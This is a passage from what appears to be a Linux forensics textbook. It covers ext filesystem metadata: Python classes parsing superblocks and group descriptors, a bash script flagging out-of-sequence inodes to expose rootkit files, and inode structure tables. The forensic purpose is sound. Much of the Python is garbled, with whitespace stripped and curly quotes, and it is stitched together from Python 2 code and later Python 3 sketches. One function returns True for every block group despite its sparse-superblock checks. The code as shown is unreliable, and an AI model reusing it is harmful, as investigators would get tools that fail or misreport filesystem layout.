return(inodeNo-1)/self.inodesPerGroup

defgroupIndexFromInode(self,inodeNo):

return(inodeNo-1)%self.inodesPerGroup

defgroupHasSuperblock(self,bgNo):

#blockgroupzeroalwayshasasuperblock

ifbgNo==0:

returnTrue

retVal=False

if‘MetaBlockGroups’inself.incompatibleFeaturesListand\

bgNo>=self.firstMetaBlockGroup:

#metablockgroupshaveasbandgdtin1stand

#2ndandlastofeachmetagroup

#metablockgroupsizeisblocksize/32

#onlypartoffilesystemmightusethisfeature

mbgSize=self.blockSize/32

retVal=(bgNo%mbgSize==0)or\

((bgNo+1)%mbgSize==0)or\

((bgNo-1)%mbgSize==0)

elif‘SparseSuper2’inself.compatibleFeaturesList:

#twobackupsuperblocksinself.backupBlockGroups

ifbgNo==self.backupBlockGroups[0]or\

bgNo==self.backupBlockGroups[1]:

retVal=True

elif‘SparseSuper’inself.readOnlyCompatibleFeaturesList:

#backupsin1,powersof3,5,and7

retVal=(bgNo==1)or\

(bgNo==pow(3,round(log(bgNo)/log(3))))\

or(bgNo==pow(5,round(log(bgNo)/log(5))))\

or(bgNo==pow(7,round(log(bgNo)/log(7))))

ifretVal:

returnretVal

else:

#ifwegotthisfarwemusthavedefault

#witheverybghavingsbandgdt

retVal=True

returnretVal

"""
This class stores the raw group descriptors from
a Linux extended (ext2/ext3/ext4) filesystem. It
is little more than a glorified structure. Both
32-bit and 64-bit (wide) filesystems are supported.
It is up to date as of July 2015.

Usage: gd = GroupDescriptor(data, wide) where
data is a 32 byte group descriptor if wide is false
or 64 byte group descriptor if wide is true.
gd.prettyPrint() prints all the fields in an
organized manner.
"""

classGroupDescriptor():

def__init__(self,data,wide=False):

self.wide=wide

#/*Blocksbitmapblock*/

self.blockBitmapLo=getU32(data)

#/*Inodesbitmapblock*/

self.inodeBitmapLo=getU32(data,4)

#/*Inodestableblock*/

self.inodeTableLo=getU32(data,8)

#/*Freeblockscount*/

self.freeBlocksCountLo=getU16(data,0xc)

#/*Freeinodescount*/

self.freeInodesCountLo=getU16(data,0xe)

#/*Directoriescount*/

self.usedDirsCountLo=getU16(data,0x10)

#/*EXT4_BG_flags(INODE_UNINIT,etc)*/

self.flags=getU16(data,0x12)

self.flagList=self.printFlagList()

#/*Excludebitmapforsnapshots*/

self.excludeBitmapLo=getU32(data,0x14)

#/*crc32c(s_uuid+grp_num+bbitmap)LE*/

self.blockBitmapCsumLo=getU16(data,0x18)

#/*crc32c(s_uuid+grp_num+ibitmap)LE*/

self.inodeBitmapCsumLo=getU16(data,0x1a)

#/*Unusedinodescount*/

self.itableUnusedLo=getU16(data,0x1c)

#/*crc16(sb_uuid+group+desc)*/

self.checksum=getU16(data,0x1e)

ifwide==True:

#/*BlocksbitmapblockMSB*/

self.blockBitmapHi=getU32(data,0x20)

#/*InodesbitmapblockMSB*/

self.inodeBitmapHi=getU32(data,0x24)

#/*InodestableblockMSB*/

self.inodeTableHi=getU32(data,0x28)

#/*FreeblockscountMSB*/

self.freeBlocksCountHi=getU16(data,0x2c)

#/*FreeinodescountMSB*/

self.freeInodesCountHi=getU16(data,0x2e)

#/*DirectoriescountMSB*/

self.usedDirsCountHi=getU16(data,0x30)

#/*UnusedinodescountMSB*/

self.itableUnusedHi=getU16(data,0x32)

#/*ExcludebitmapblockMSB*/

self.excludeBitmapHi=getU32(data,0x34)

#/*crc32c(s_uuid+grp_num+bbitmap)BE*/

self.blockBitmapCsumHi=getU16(data,0x38)

#/*crc32c(s_uuid+grp_num+ibitmap)BE*/

self.inodeBitmapCsumHi=getU16(data,0x3a)

self.reserved=getU32(data,0x3c)

defprintFlagList(self):

flagList=[]

#inodetableandbitmaparenotinitialized(EXT4_BG_INODE_UNINIT).

ifself.flags&0x1:

flagList.append(‘InodeUninitialized’)

#blockbitmapisnotinitialized(EXT4_BG_BLOCK_UNINIT).

ifself.flags&0x2:

flagList.append(‘BlockUninitialized’)

#inodetableiszeroed(EXT4_BG_INODE_ZEROED).

ifself.flags&0x4:

flagList.append(‘InodeZeroed’)

returnflagList

defprettyPrint(self):

fork,vinsorted(self.__dict__.iteritems()):

printk+”:”,v

"""
This class combines information from the block group descriptor
and the superblock to more fully describe the block group. It
is up to date as of July 2015.

Usage: egd = ExtendedGroupDescriptor(bgd, sb, bgNo) where
bgd is a GroupDescriptor object, sb is a Superblock object,
and bgNo is a block group number.
egd.prettyPrint() prints out various statistics for the
block group and also its layout.
"""

classExtendedGroupDescriptor():

def__init__(self,bgd,sb,bgNo):

self.blockGroup=bgNo

self.startBlock=sb.groupStartBlock(bgNo)

self.endBlock=sb.groupEndBlock(bgNo)

self.startInode=sb.groupStartInode(bgNo)

self.endInode=sb.groupEndInode(bgNo)

self.flags=bgd.printFlagList()

self.freeInodes=bgd.freeInodesCountLo

ifbgd.wide:

self.freeInodes+=bgd.freeInodesCountHi*pow(2,16)

self.freeBlocks=bgd.freeBlocksCountLo

ifbgd.wide:

self.freeBlocks+=bgd.freeBlocksCountHi*pow(2,16)

self.directories=bgd.usedDirsCountLo

ifbgd.wide:

self.directories+=bgd.usedDirsCountHi*pow(2,16)

self.checksum=bgd.checksum

self.blockBitmapChecksum=bgd.blockBitmapCsumLo

ifbgd.wide:

self.blockBitmapChecksum+=bgd.blockBitmapCsumHi*pow(2,16)

self.inodeBitmapChecksum=bgd.inodeBitmapCsumLo

ifbgd.wide:

self.inodeBitmapChecksum+=bgd.inodeBitmapCsumHi*pow(2,16)

#nowfigureoutthelayoutandstoreitinalist(withlistsinside)

self.layout=[]

self.nonDataBlocks=0

#forflexibleblockgroupsmustmakeanadjustment

fbgAdj=1

if‘FlexibleBlockGroups’insb.incompatibleFeaturesList:

#onlyfirstgroupinflexblockaffected

ifbgNo%sb.groupsPerFlex==0:

fbgAdj=sb.groupsPerFlex

        if sb.groupHasSuperblock(bgNo):
            self.layout.append(['Superblock', self.startBlock, \
                self.startBlock])
            # the continuation backslash is required for this
            # expression to span two lines
            gdSize = sb.groupDescriptorSize() * sb.blockGroups() / \
                sb.blockSize
            self.layout.append(['Group Descriptor Table', \
                self.startBlock + 1, self.startBlock + gdSize])
            self.nonDataBlocks += gdSize + 1
            if sb.reservedGdtBlocks > 0:
                self.layout.append(['Reserved GDT Blocks', \
                    self.startBlock + gdSize + 1, \
                    self.startBlock + gdSize + sb.reservedGdtBlocks])
                self.nonDataBlocks += sb.reservedGdtBlocks

bbm=bgd.blockBitmapLo

ifbgd.wide:

bbm+=bgd.blockBitmapHi*pow(2,32)

self.layout.append([‘DataBlockBitmap’,bbm,bbm])

#isblockbitmapinthisgroup(notflexblockgroup,etc)

ifsb.groupFromBlock(bbm)==bgNo:

self.nonDataBlocks+=fbgAdj

ibm=bgd.inodeBitmapLo

ifbgd.wide:

ibm+=bgd.inodeBitmapHi*pow(2,32)

self.layout.append([‘InodeBitmap’,ibm,ibm])

#isinodebitmapinthisgroup?

ifsb.groupFromBlock(ibm)==bgNo:

self.nonDataBlocks+=fbgAdj

it=bgd.inodeTableLo

ifbgd.wide:

it+=bgd.inodeTableHi*pow(2,32)

itBlocks=(sb.inodesPerGroup*sb.inodeSize)/sb.blockSize

self.layout.append([‘InodeTable’,it,it+itBlocks-1])

#isinodetableinthisgroup?

ifsb.groupFromBlock(it)==bgNo:

self.nonDataBlocks+=itBlocks*fbgAdj

self.layout.append([‘DataBlocks’,self.startBlock\

+self.nonDataBlocks,self.endBlock])

defprettyPrint(self):

print“”

print‘BlockGroup:‘+str(self.blockGroup)

print‘Flags:%r‘%self.flags

print‘Blocks:%s-%s‘%(self.startBlock,self.endBlock)

print‘Inodes:%s-%s‘%(self.startInode,self.endInode)

print‘Layout:’

foriteminself.layout:

print‘%s%s-%s’%(item[0],item[1],item[2])

print‘FreeInodes:%u‘%self.freeInodes

print‘FreeBlocks:%u‘%self.freeBlocks

print‘Directories:%u‘%self.directories

print‘Checksum:0x%x‘%self.checksum

print‘BlockBitmapChecksum:0x%x‘%self.blockBitmapChecksum

print‘InodeBitmapChecksum:0x%x‘%self.inodeBitmapChecksum

"""
This class reads the superblock and block group descriptors
from an image file containing a Linux extended (ext2/ext3/ext4)
filesystem and then stores the filesystem metadata in an organized
manner. It is up to date as of July 2015.

Usage: emd = ExtMetadata(filename, offset) where filename is a
raw image file and offset is the offset in 512 byte sectors from
the start of the file to the first sector of the extended filesystem.
emd.prettyPrint() will print out the superblock information and
then iterate over each block group printing statistics and layout
information.
"""

classExtMetadata():

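    def __init__(self, filename, offset):
        # verify the image file passed to the constructor exists
        # (not sys.argv[1], which may differ when used as a library)
        if not os.path.isfile(str(filename)):
            print("File " + str(filename) + \
                " cannot be opened for reading")
            exit(1)
        # the superblock starts 1024 bytes into the filesystem
        with open(str(filename), 'rb') as f:
            f.seek(1024 + int(offset) * 512)
            sbRaw = str(f.read(1024))
        self.superblock = Superblock(sbRaw)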

#readblockgroupdescriptors

self.blockGroups=self.superblock.blockGroups()

ifself.superblock.descriptorSize!=0:

self.wideBlockGroups=True

self.blockGroupDescriptorSize=64

else:

self.wideBlockGroups=False

self.blockGroupDescriptorSize=32

#readingroupdescriptorsstartinginblock1

withopen(str(filename),‘rb’)asf:

f.seek(int(offset)*512+self.superblock.blockSize)

bgdRaw=str(f.read(self.blockGroups*\

self.blockGroupDescriptorSize))

self.bgdList=[]

foriinrange(0,self.blockGroups):

bgd=GroupDescriptor(bgdRaw[i*self.blockGroupDescriptorSize:]\

,self.wideBlockGroups)

ebgd=ExtendedGroupDescriptor(bgd,self.superblock,i)

self.bgdList.append(ebgd)

defprettyPrint(self):

self.superblock.prettyPrint()

forbgdinself.bgdList:

bgd.prettyPrint()

defusage():

print(“usage“+sys.argv[0]+\

“<imagefile><offsetinsectors>\n”+\

“Readssuperblockfromanimagefile”)

exit(1)

defmain():

iflen(sys.argv)<3:

usage()

#readfirstsector

ifnotos.path.isfile(sys.argv[1]):

        print("File " + sys.argv[1] + " cannot be opened for reading")

exit(1)

emd=ExtMetadata(sys.argv[1],sys.argv[2])

emd.prettyPrint()

if__name__==“__main__”:

main()

Partial results from running this script against the PFE subject system image are shown in Figure 7.13, Figure 7.14, and Figure 7.15. In Figure 7.13 we see that flexible block groups are in use. Not shown in this figure is a flexible block group size of 16. In Figure 7.14 the first block group is shown. As is always the case, it contains a superblock and group descriptor table (including the reserved blocks for future expansion). You will notice that there are 16 blocks between the data bitmap and inode bitmap, and also between the inode bitmap and the inode table. This is because this is the first group in a flexible group (size = 16), and it houses these values for all block groups within the flex group.

FIGURE 7.13

Result of running the extfs.py script on the PFE subject system – Part 1.

FIGURE 7.14

Result of running the extfs.py script on the PFE subject system – Part 2.

In Figure 7.15 we see that block group 3 has a superblock and group descriptor table. This is because the Sparse Super feature is in use, which stores the superblock and group descriptor table in groups that are powers of 3, 5, or 7. If you examine the full output from this command you will see that all of these backup superblocks and group descriptor tables are in the correct places.

FIGURE 7.15

Result of running the extfs.py script on the PFE subject system – Part 3.
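The Sparse Super placement rule can also be checked with integer arithmetic only, which avoids any rounding concerns with logarithms. What follows is a minimal sketch in Python 3 (the listings in this book target Python 2); the names is_power_of and sparse_backup_groups are illustrative and are not part of extfs.py.

```python
def is_power_of(n, base):
    """Return True if n equals base**k for some integer k >= 1."""
    if n < base:
        return False
    while n % base == 0:
        n //= base
    return n == 1


def sparse_backup_groups(total_groups):
    """List block groups that hold a superblock under Sparse Super.

    Group 0 holds the primary superblock; group 1 and every group
    whose number is a power of 3, 5, or 7 hold the backups.
    """
    groups = []
    for bg in range(total_groups):
        if bg in (0, 1) or any(is_power_of(bg, b) for b in (3, 5, 7)):
            groups.append(bg)
    return groups


if __name__ == "__main__":
    # a hypothetical filesystem with 100 block groups
    print(sparse_backup_groups(100))
```

For a hypothetical filesystem with 100 block groups this yields groups 0, 1, 3, 5, 7, 9, 25, 27, 49, and 81, which is the pattern to look for in the full script output.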

Before we move on to a new topic, I feel that I should point out that we have merely scratched the surface of what can be done with the classes found in this script. For example, the classes could easily be used to calculate the offset into an image for a given inode or data block. They could also be used to work backward from an offset to figure out what is stored in any given sector. Now that we have learned all of the basics of the extended filesystems we will move on to discussing how we might detect an attacker's actions, even if he or she has altered timestamps on the filesystem.
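As a rough illustration of the offset calculations mentioned above, the sketch below converts between block numbers and byte offsets in a raw image. It is written for Python 3 and is not part of extfs.py; the function names and the partition_start_sector parameter are assumptions made for this example, with the sector offset playing the same role as the script's offset argument.

```python
SECTOR_SIZE = 512  # bytes per sector, matching the script's offset units


def block_to_image_offset(block_no, block_size, partition_start_sector=0):
    """Byte offset into the image at which a filesystem block begins."""
    return partition_start_sector * SECTOR_SIZE + block_no * block_size


def image_offset_to_block(offset, block_size, partition_start_sector=0):
    """Work backward from an image offset to (block number, byte in block)."""
    fs_offset = offset - partition_start_sector * SECTOR_SIZE
    if fs_offset < 0:
        raise ValueError("offset lies before the start of the filesystem")
    return divmod(fs_offset, block_size)
```

In practice the block size would come from the Superblock object (sb.blockSize) rather than being passed in by hand.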

FINDING THINGS THAT ARE OUT OF PLACE

Thus far in this chapter we have seen a lot of theory on how the extended filesystem works. We can leverage that knowledge to find things that are out of place or not quite right. After all, this is normally what the forensic investigator is after. Inconsistencies and uncommon situations often point to an attacker's attempt to hide his or her actions.

Some of the system directories such as /sbin and /bin are highly targeted by attackers. Even the lowly ls command can often be enough to detect alterations in these directories. How can we detect tampering in a system directory? When the system is installed, files in the system directories are copied one after the other. As a result, the files are usually stored in sequential inodes. Anything added later by an attacker will likely have a higher inode number.

The command ls -ali will list all files (-a) with a long listing (-l) which will begin with an inode number (-i). If we take the results of this command and pipe them to sort -n, they will be sorted numerically (-n) by inode number. The results of running ls -ali bin | sort -n from within the mount directory (subject's root directory) of the PFE subject system are shown in Figure 7.16. Files associated with the Xing Yi Quan rootkit are highlighted. Notice that the inodes are mostly sequential and suddenly jump from 655,549 to 657,076 when the malware was installed.

FIGURE 7.16

Results of running ls -ali bin | sort -n on PFE subject image. The highlighted files are from a rootkit installation.

Some readers may have expected the inode numbers to be considerably higher. The primary reason that they are only a few thousand inodes away is that Linux will do its best to store files in a given directory in the same block group. Only when there is no space in the containing directory's block group will the file be stored elsewhere. This is a performance optimization that attempts to minimize movement of the read/write heads on a hard drive.

In this case the attacker did not attempt to alter the timestamps on the rootkit files. There are many tools that will allow you to easily modify these timestamps. The important thing to realize is that no matter what you do to the timestamps, the inodes will reveal recently added files every time.
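The same inode-ordered listing can be produced from Python when the output needs further processing. The following is a small Python 3 sketch, not taken from the book's scripts; the function name entries_by_inode is made up for this example, and it assumes the subject filesystem is mounted (read-only) so that the directory can be read normally.

```python
import os


def entries_by_inode(path):
    """Return (inode, name) pairs for a directory, sorted by inode number."""
    with os.scandir(path) as entries:
        return sorted((entry.inode(), entry.name) for entry in entries)


if __name__ == "__main__":
    # "bin" is relative to the mount point of the subject image
    for inode, name in entries_by_inode("bin"):
        print(inode, name)
```

Unlike ls -a, os.scandir does not return the . and .. entries, so only real directory entries appear in the result.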

The ls command supports a few basic sorts. The default sort is alphabetical, but it will also sort by extension, size, time, and version. The command ls -aliR <directory> --sort=size will perform a recursive (-R) listing of a directory with everything sorted by size (largest to smallest). Partial results of running ls -aliR bin --sort=size are shown in Figure 7.17.

FIGURE 7.17

Partial results of running ls -aliR bin --sort=size against the PFE subject image.

Have a look at the highlighted files bash and false from Figure 7.17. Notice anything unusual? The only thing /bin/false does is return the value false when called. Yet this is one of the three largest files in the /bin directory. It is also suspiciously the exact same size as /bin/bash. What appears to have happened here is that the attacker copied /bin/bash on top of /bin/false in an attempt to log in with system accounts. Notice that this attacker was not terribly sophisticated, as evidenced by the fact that they didn't change the timestamp on /bin/false when they were done.
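Matching sizes are only a hint; comparing hashes confirms whether two binaries really have the same contents. The sketch below, in Python 3, groups regular files in a directory by size and then by SHA-256 digest. It is an illustration rather than one of the book's scripts, and the names file_sha256 and duplicate_files are hypothetical.

```python
import hashlib
import os
from collections import defaultdict


def file_sha256(path, chunk_size=65536):
    """Hash a file in chunks so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def duplicate_files(directory):
    """Return lists of paths whose regular files have identical contents."""
    by_size = defaultdict(list)
    for entry in os.scandir(directory):
        if entry.is_file(follow_symlinks=False):
            size = entry.stat(follow_symlinks=False).st_size
            by_size[size].append(entry.path)
    duplicates = []
    for paths in by_size.values():
        if len(paths) < 2:
            continue  # a unique size cannot be a duplicate
        by_hash = defaultdict(list)
        for path in paths:
            by_hash[file_sha256(path)].append(path)
        duplicates.extend(sorted(g) for g in by_hash.values() if len(g) > 1)
    return duplicates
```

Note that hard links to the same inode will also be reported, since they share contents by definition; the inode numbers from the listing distinguish that benign case from a copied binary.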

Because the attacker failed to modify the timestamps, a listing sorted by time will also show what has happened pretty clearly. A partial listing of results from the ls -aliR bin --sort=time command is shown in Figure 7.18. The highlighted portion shows both the rootkit files and the recently altered /bin/false.

FIGURE 7.18

Partial results from running ls -aliR bin --sort=time against the PFE subject image.

The advantage of running the ls command as shown in this section is that it is simple. The downside is that you have to carefully scrutinize the output to detect any gaps in the inode numbers. Some readers might have seen monthly bank statements that list checks that have been cashed against the account, listed in order, with a notation if a check number is missing.

Wouldn't it be great if we could have a shell script that did something similar to the bank statement? Well, you are in luck; such a script follows. You are extra fortunate, as there are some new shell scripting techniques used in this script.

#!/bin/bash
#
# out-of-seq-inodes.sh
#
# Simple script to list out of
# sequence inodes.
# Intended to be used as part of
# a forensics investigation.
# As developed for PentesterAcademy.com
# by Dr. Phil Polstra (@ppolstra)

usage () {
  echo "Usage: $0 <path>"
  echo "Simple script to list a directory and print a warning if"
  echo "the inodes are out of sequence as will happen if system"
  echo "binaries are overwritten."
  exit 1
}

if [ $# -lt 1 ] ; then
  usage
fi

# output a listing sorted by inode number to a temp file
templs='/tmp/temp-ls.txt'
ls -ali "$1" | sort -n > $templs

# this is for discarding first couple lines in output
foundfirstinode=false
declare -i startinode

while read line
do
  # there is usually a line or two of non-file stuff at start of output
  # the if statement helps us get past that
  if [ "$foundfirstinode" = false ] \
    && [ "`echo $line | wc -w`" -gt 6 ] ; then
    startinode=`expr $(echo $line | awk '{print $1}')`
    echo "Start inode = $startinode"
    foundfirstinode=true
  fi
  q=$(echo $line | awk '{print $1}')
  if [[ $q =~ ^[0-9]+$ ]] && \
     [ "$startinode" -lt $q ];
  then
    if [ $((startinode + 2)) -lt $q ] ; then
      echo -e "\e[31m****Out of Sequence inode detected**** \
expect $startinode got $q\e[0m"
    else
      echo -e "\e[33m****Out of Sequence inode detected**** \
expect $startinode got $q\e[0m"
    fi
    # reset the startinode to point to this value for next entry
    startinode=`expr $(echo $line | awk '{print $1}')`
  fi
  echo "$line"
  startinode=$((startinode+1))
done < $templs

rm $templs

The script starts with the usual she-bang, followed by a usage function which is called when no command line arguments were passed in. To improve performance and also make the script simpler, the output from ls -ali <directory> | sort -n is sent to a temporary file. Two variables, foundfirstinode and startinode, are created. The line declare -i startinode is new. This line creates a new variable with the integer attribute. Bash treats an integer variable that has not yet been assigned as zero in arithmetic. We will see later in the script why this is needed.

The line while read line begins a do loop. You might wonder where this line is coming from. If you look down a few lines, you will see a line that reads done < $templs. This construct redirects the temporary file to be input for the loop. Essentially, this do loop reads the temporary file line by line and performs the actions listed within the loop code.

The if block at the start of the do loop is used to consume any headers output by ls. The if has two tests anded together with the && operator. The first test checks to see if foundfirstinode is false, which indicates we have not made it past any header lines to the actual file data yet. The second test executes the command echo $line | wc -w and tests if the result is greater than six. Recall that enclosing a command in back ticks causes it to be executed and the results converted to a string. This command echoes the line, which is piped to the word count utility, wc. Normally this utility will print out line, word, and byte counts, but the -w option causes only the word count to be printed. Any output lines pertaining to files will have at least seven words. If this is the case, the startinode variable is set, a message is echoed to the screen, and foundfirstinode is set to true.

The line startinode=`expr $(echo $line | awk '{print $1}')` is easier to understand if you work from the parentheses outward. The command echo $line | awk '{print $1}' echoes the line and pipes it to awk, which then prints the first word (start of the line up to the first whitespace character). Recall that the inode number is listed first by the ls command. This inode number then gets passed to expr <inode number>, which is executed because it is enclosed in back ticks. This inode number is stored in the integer variable startinode, which was declared earlier in the script.

After the if block (which is only run until we find our first file), the line q=$(echo $line | awk '{print $1}') sets the value of q equal to the inode number for the current line. If startinode is less than the current inode number, a warning message is printed. The nested if/else statement is used to print a message in red if the inode number jumped up by more than two. Otherwise the message is printed in yellow. The funny characters in the echo statements are called escape sequences. The -e option to echo is needed to have echo evaluate the escape sequences (which begin with \e) rather than just print out the raw characters. If the message was displayed, the startinode variable is reset to the current inode number.

Regardless of whether or not a message was printed, the line is echoed. The startinode variable is incremented on the line startinode=$((startinode+1)). Recall that $(()) is used to cause bash to evaluate what is contained in the parentheses in math mode. This is why we had to declare startinode as an integer earlier in the script. Only integer values can be incremented like this. When the loop exits, the temporary file is deleted. Partial results of running this script against the PFE subject system's /bin directory are shown in Figure 7.19. Notice the red warnings before the rootkit files.

FIGURE 7.19

Partial results of running out-of-seq-inodes.sh against the PFE subject system's /bin directory. Note the warning for the rootkit files.
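The gap detection at the heart of the shell script is independent of ls and can be expressed in a few lines. The following Python 3 sketch mirrors the script's logic under the assumption that the inode numbers have already been collected into a list; the function name find_inode_gaps and the tolerance parameter are inventions for this example (the shell script hard-codes a jump of more than two as its red warning).

```python
def find_inode_gaps(inodes, tolerance=2):
    """Return (expected, found, severe) for each break in an inode run.

    expected is the inode number that would continue the sequence,
    found is the number actually seen, and severe is True when the
    jump is larger than the tolerance (the script's red warning).
    """
    gaps = []
    expected = None
    for inode in sorted(inodes):
        if expected is not None and inode > expected:
            gaps.append((expected, inode, inode > expected + tolerance))
        # as in the script, the next entry should follow this one
        expected = inode + 1
    return gaps


if __name__ == "__main__":
    listing = [655547, 655548, 655549, 657076, 657077]
    for expected, found, severe in find_inode_gaps(listing):
        level = "LARGE GAP" if severe else "small gap"
        print("%s: expected %d got %d" % (level, expected, found))
```

The sample list uses the jump from 655,549 to 657,076 seen in Figure 7.16; the surrounding values are made up for illustration.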

INODES

Now that we have had a little break from theory and had our fun with some scripting, it is time to get back to learning more about the keepers of the metadata, the inodes. For ext2 and ext3 filesystems the inodes are 128 bytes long. As of this writing the ext4 filesystem uses 156 byte inodes, but it allocates 256 bytes on the disk. These extra 100 bytes are for future expansion and may also be used for storage, as we will see later in this chapter.

In order to use inodes you must first find them. The block group associated with an inode is easily calculated using the following formula:

block group = (inode number - 1) / (inodes per group)

Obviously integer division should be used here, as block groups are integers. Once the correct block group has been located, the index within the block group's inode table must be calculated. This is easily done with the modulus operator. Recall that x mod y gives the remainder when performing the integer division x / y. The formula for the index is simply:

index = (inode number - 1) mod (inodes per group)

Finally, the offset into the inode table is given by:

offset = index * (inode size on disk)
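The three formulas can be combined into one small function. This is a Python 3 sketch rather than part of extfs.py, and the name locate_inode is illustrative. The figures used in the example (8192 inodes per group and 256-byte on-disk inodes) are assumed values for demonstration and were not read from the PFE subject image.

```python
def locate_inode(inode_no, inodes_per_group, inode_size):
    """Return (block group, index in group, byte offset in inode table)."""
    if inode_no < 1:
        raise ValueError("inode numbering starts at 1")
    # divmod performs the integer division and modulus in one step
    block_group, index = divmod(inode_no - 1, inodes_per_group)
    return block_group, index, index * inode_size


if __name__ == "__main__":
    print(locate_inode(657076, 8192, 256))
```

With those assumed values, inode 657,076 falls in block group 80 at index 1715, which is 439,040 bytes into that group's inode table.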

The inode structure is summarized in Table 7.5. Most of these fields are self-explanatory. Those that are not will be described in more detail in this section.

There are two operating system dependent unions (OSDs) in the inode. These will vary from what is described here if your filesystem comes from Hurd or BSD. The first OSD for filesystems created by Linux holds the inode version. For extended filesystems created by Linux, the second OSD contains the upper 16 bits of several values.

The block array stores fifteen 32-bit block addresses. If this was used to directly store blocks that make up a file, it would be extremely limiting. For example, if 4-kilobyte blocks are in use, files would be limited to 60 kilobytes! This is not how this array is used, however. The first twelve entries are direct block entries which contain the block numbers for the first twelve data blocks (48 kB when using 4 kB blocks) that make up a file. If more space is required, the thirteenth entry has the block number for a singly indirect block. The singly indirect block is a data block that contains a list of data blocks that make up a file. If the block size is 4 kB the singly indirect block can point to 1024 data blocks. The maximum amount that can be stored using singly indirect blocks is then (size of a data block) * (number of block addresses that can be stored in a data block) or (4 kB) * (1024), which equals 4 megabytes.

For files too large to be stored with direct blocks and singly indirect blocks (48 kB + 4 MB), the fourteenth entry contains the block number for a doubly indirect block. The doubly indirect block points to a block that contains a list of singly indirect blocks. The doubly indirect blocks can store 1024 times as much as singly indirect blocks (again assuming 4 kB blocks), which means that files as large as (48 kB + 4 MB + 4 GB) can be accommodated. If this is still not enough space, the final entry contains a pointer to triply indirect blocks, allowing files as large as (48 kB + 4 MB + 4 GB + 4 TB) to be stored. This block system is illustrated in Figure 7.20.

FIGURE 7.20

Data blocks in inode block array.
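The capacity arithmetic for the block array generalizes to any block size. The sketch below is a Python 3 illustration, not part of the book's scripts; the function name indirect_capacity is made up, and the defaults reflect the 4-byte block addresses and twelve direct entries described in the text.

```python
def indirect_capacity(block_size, pointer_size=4, direct_pointers=12):
    """Bytes addressable at each level of the inode block array."""
    # number of block addresses that fit in one data block
    per_block = block_size // pointer_size
    return {
        "direct": direct_pointers * block_size,
        "single": per_block * block_size,
        "double": per_block ** 2 * block_size,
        "triple": per_block ** 3 * block_size,
    }


if __name__ == "__main__":
    capacity = indirect_capacity(4096)
    for level in ("direct", "single", "double", "triple"):
        print("%-7s %d bytes" % (level, capacity[level]))
    print("maximum %d bytes" % sum(capacity.values()))
```

For 4 kB blocks the four levels come to 48 kB, 4 MB, 4 GB, and 4 TB respectively, matching the figures in the text.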

If you are looking at an ext2 or ext3 filesystem, then the list of inode fields in Table 7.5 is complete. For ext4 filesystems the fields in Table 7.6 have been added. Most of these fields are extra time bits.

Table 7.5. Inode structure.

Offset  Size  Name               Description
0x0     2     File Mode          File mode and type
0x2     2     UID                Lower 16 bits of owner ID
0x4     4     Size lo            Lower 32 bits of file size
0x8     4     Atime              Access time in seconds since epoch
0xC     4     Ctime              Change time in seconds since epoch
0x10    4     Mtime              Modify time in seconds since epoch
0x14    4     Dtime              Delete time in seconds since epoch
0x18    2     GID                Lower 16 bits of group ID
0x1A    2     Hlink count        Hard link count
0x1C    4     Blocks lo          Lower 32 bits of block count
0x20    4     Flags              Flags
0x24    4     Union osd1         Linux: l version
0x28    60    Block[15]          15 pointers to data blocks
0x64    4     Version            File version for NFS
0x68    4     File ACL low       Lower 32 bits of extended attributes (ACL, etc.)
0x6C    4     File size hi       Upper 32 bits of file size (ext4 only)
0x70    4     Obsolete fragment  An obsoleted fragment address
0x74    12    Osd2               Second operating system dependent union
0x74    2     Blocks hi          Upper 16 bits of block count
0x76    2     File ACL hi        Upper 16 bits of extended attributes (ACL, etc.)
0x78    2     UID hi             Upper 16 bits of owner ID
0x7A    2     GID hi             Upper 16 bits of group ID
0x7C    2     Checksum lo        Lower 16 bits of inode checksum

Table 7.6. Extra inode fields in ext4 filesystems.

Offset  Size  Name          Description
0x80    2     Extra size    How many bytes beyond standard 128 are used
0x82    2     Checksum hi   Upper 16 bits of inode checksum
0x84    4     Ctime extra   Change time extra bits
0x88    4     Mtime extra   Modify time extra bits
0x8C    4     Atime extra   Access time extra bits
0x90    4     Crtime        File create time (seconds since epoch)
0x94    4     Crtime extra  File create time extra bits
0x98    4     Version hi    Upper 32 bits of version
0x9C          Unused        Reserved space for future expansions

A word about the extra time bits is in order. Linux is facing a serious problem. In the year 2038 the 32-bit timestamps will roll over. While that is over two decades away, a solution is already in place (Hurray for Open Source!). The solution is to expand the 32-bit time structure to 64 bits. In order to prevent backward compatibility problems the original 32-bit time structure (stored in the first 128 bytes of inodes) remains unchanged; it is still just seconds since the epoch on January 1, 1970. Each timestamp has a corresponding 32-bit extra field (see Table 7.6). The lower two bits of this extra field are used to extend the 32-bit seconds counter to 34 bits, which makes everything good until the year 2446. The upper thirty bits of the extra field are used to store nanoseconds.
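Combining a 32-bit timestamp with its extra field takes only a mask and two shifts. The following Python 3 sketch illustrates the layout just described; the function name decode_ext4_time is hypothetical. It treats the 32-bit seconds value as unsigned, as the getU32 helper in extfs.py does, which is an assumption that holds for dates after 1970.

```python
def decode_ext4_time(seconds_lo, extra):
    """Combine a 32-bit timestamp with its ext4 extra field.

    Returns (seconds since epoch, nanoseconds).
    """
    epoch_bits = extra & 0x3       # lower two bits extend the seconds
    nanoseconds = extra >> 2       # upper thirty bits hold nanoseconds
    seconds = seconds_lo + (epoch_bits << 32)
    return seconds, nanoseconds


if __name__ == "__main__":
    # hypothetical values: a July 2015 timestamp plus half a second
    extra = (500000000 << 2) | 0
    print(decode_ext4_time(1436745600, extra))
```

The Inode class later in this section keeps only the nanoseconds (by shifting right two bits) and ignores the two epoch bits, which is harmless until the seconds counter overflows.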

This nanosecond accuracy is a dream for forensic investigators. By way of comparison, Windows FAT filesystems provide only a two second resolution and even the latest version of NTFS only provides accuracy to the nearest 100 nanoseconds. This is another reason to use Python and other tools to parse the inodes, as standard tools don't normally display the complete timestamp. This high precision makes timeline analysis easier since you do not have to guess what changed first in a two second interval.

There are a number of special inodes. These are summarized in Table 7.7. Of the inodes listed, the root directory (inode 2) and journal (inode 8) are some of the more important ones for forensic investigators.

Table 7.7. Special purpose inodes.

Inode  Special Purpose
0      No such inode, numbering starts at 1
1      Defective block list
2      Root directory
3      User quotas
4      Group quotas
5      Boot loader
6      Undelete directory
7      Reserved group descriptors (for resizing filesystem)
8      Journal
9      Exclude inode (for snapshots)
10     Replica inode
11     First non-reserved inode (often lost+found)

Reading inodes with Python

Once again we turn to Python in order to easily interpret the inode data. To accomplish this we will add a new Inode class to our ever-expanding extfs.py file. The new class and helper functions follow.

"""
